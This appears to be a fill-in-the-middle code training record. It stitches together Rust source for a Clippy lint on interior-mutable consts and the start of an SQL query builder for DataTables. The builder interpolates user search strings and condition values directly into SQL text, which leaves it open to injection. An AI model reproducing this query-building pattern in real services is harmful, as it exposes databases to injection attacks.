/// contains an `UnsafeCell`, by recursively destructuring the value.
/// Evaluation errors are treated per the comment inside (`TooGeneric` counts as unfrozen).
fn is_value_unfrozen_raw<'tcx>(
    cx: &LateContext<'tcx>,
    result: Result<ConstValue<'tcx>, ErrorHandled>,
    ty: Ty<'tcx>,
) -> bool {
    // Recursively digs through structs/arrays/tuples looking for an `UnsafeCell`.
    fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
        match val.ty.kind() {
            // the fact that we have to dig into every structs to search enums
            // leads us to the point checking `UnsafeCell` directly is the only option.
            ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
            ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
                let val = cx.tcx.destructure_const(cx.param_env.and(val));
                val.fields.iter().any(|field| inner(cx, field))
            },
            _ => false,
        }
    }
    result.map_or_else(
        |err| {
            // Consider `TooGeneric` cases as being unfrozen.
            // This causes a false positive where an assoc const whose type is unfrozen
            // have a value that is a frozen variant with a generic param (an example is
            // `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
            // However, it prevents a number of false negatives that is, I think, important:
            // 1. assoc consts in trait defs referring to consts of themselves
            // (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
            // 2. a path expr referring to assoc consts whose type is doesn't have
            // any frozen variants in trait defs (i.e. without substitute for `Self`).
            // (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
            // 3. similar to the false positive above;
            // but the value is an unfrozen variant, or the type has no enums. (An example is
            // `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
            // and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
            // One might be able to prevent these FNs correctly, and replace this with `false`;
            // e.g. implementing `has_frozen_variant` described above, and not running this function
            // when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
            // case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
            // similar to 2., but with the a frozen variant) (e.g. borrowing
            // `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
            // I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
            err == ErrorHandled::TooGeneric
        },
        |val| inner(cx, Const::from_value(cx.tcx, val, ty)),
    )
}
/// Evaluates the const body identified by `body_id` polymorphically (no
/// substitutions) and checks whether the resulting value is unfrozen.
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
    let owner_def_id = body_id.hir_id.owner.to_def_id();
    is_value_unfrozen_raw(cx, cx.tcx.const_eval_poly(owner_def_id), ty)
}
/// Evaluates the const referenced at `hir_id`, resolving its substitutions at
/// the use site, and checks whether the resulting value is unfrozen.
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
    let substs = cx.typeck_results().node_substs(hir_id);
    let unevaluated = ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs);
    let result = cx.tcx.const_eval_resolve(cx.param_env, unevaluated, None);
    is_value_unfrozen_raw(cx, result, ty)
}
/// Where an interior mutable `const` was found, carrying the span to lint.
#[derive(Copy, Clone)]
enum Source {
    /// A free-standing `const` item.
    Item { item: Span },
    /// An associated `const` in a trait definition or an impl block.
    Assoc { item: Span },
    /// An expression borrowing an interior mutable `const`.
    Expr { expr: Span },
}
impl Source {
    /// Resolves which lint applies to this source, together with its message and span.
    #[must_use]
    fn lint(&self) -> (&'static Lint, &'static str, Span) {
        match *self {
            Self::Expr { expr } => (
                BORROW_INTERIOR_MUTABLE_CONST,
                "a `const` item with interior mutability should not be borrowed",
                expr,
            ),
            Self::Item { item } | Self::Assoc { item, .. } => (
                DECLARE_INTERIOR_MUTABLE_CONST,
                "a `const` item should never be interior mutable",
                item,
            ),
        }
    }
}
/// Emits the lint selected by `source`, attaching a fix suggestion when the
/// span does not originate from a macro expansion.
fn lint(cx: &LateContext<'_>, source: Source) {
    let (lint, msg, span) = source.lint();
    span_lint_and_then(cx, lint, span, msg, |diag| {
        // Don't give suggestions into macros.
        if span.from_expansion() {
            return;
        }
        if let Source::Item { .. } = source {
            // The `const` keyword occupies the first five bytes of the item's span.
            let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
            diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
        } else if let Source::Expr { .. } = source {
            diag.help("assign this const to a local or static variable, and use the variable here");
        }
        // `Source::Assoc` gets no extra suggestion.
    });
}
// Single lint pass driving both interior-mutable-const lints.
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
    /// Lints associated `const`s declared in trait definitions. When a default value is
    /// present, its evaluated value is checked too; otherwise the type alone decides.
    fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
        if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
            let ty = hir_ty_to_ty(cx.tcx, hir_ty);
            // Normalize assoc types because ones originated from generic params
            // bounded other traits could have their bound.
            let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
            if is_unfrozen(cx, normalized)
                // When there's no default value, lint it only according to its type;
                // in other words, lint consts whose value *could* be unfrozen, not definitely is.
                // This feels inconsistent with how the lint treats generic types,
                // which avoids linting types which potentially become unfrozen.
                // One could check whether an unfrozen type have a *frozen variant*
                // (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
                // and do the same as the case of generic types at impl items.
                // Note that it isn't sufficient to check if it has an enum
                // since all of that enum's variants can be unfrozen:
                // i.e. having an enum doesn't necessary mean a type has a frozen variant.
                // And, implementing it isn't a trivial task; it'll probably end up
                // re-implementing the trait predicate evaluation specific to `Freeze`.
                && body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
            {
                lint(cx, Source::Assoc { item: trait_item.span });
            }
        }
    }
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 {
cx.typeck_results().expr_ty(dereferenced_expr)
} else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
}
| is_unfrozen | identifier_name |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad? | ///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
is_value_unfrozen_raw(cx, result, ty)
}
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized)
// When there's no default value, lint it only according to its type;
// in other words, lint consts whose value *could* be unfrozen, not definitely is.
// This feels inconsistent with how the lint treats generic types,
// which avoids linting types which potentially become unfrozen.
// One could check whether an unfrozen type have a *frozen variant*
// (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
// and do the same as the case of generic types at impl items.
// Note that it isn't sufficient to check if it has an enum
// since all of that enum's variants can be unfrozen:
// i.e. having an enum doesn't necessary mean a type has a frozen variant.
// And, implementing it isn't a trivial task; it'll probably end up
// re-implementing the trait predicate evaluation specific to `Freeze`.
&& body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
{
lint(cx, Source::Assoc { item: trait_item.span });
}
}
}
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 {
cx.typeck_results().expr_ty(dereferenced_expr)
} else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
} | /// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place. | random_line_split |
lib.rs | /*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned() | }
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
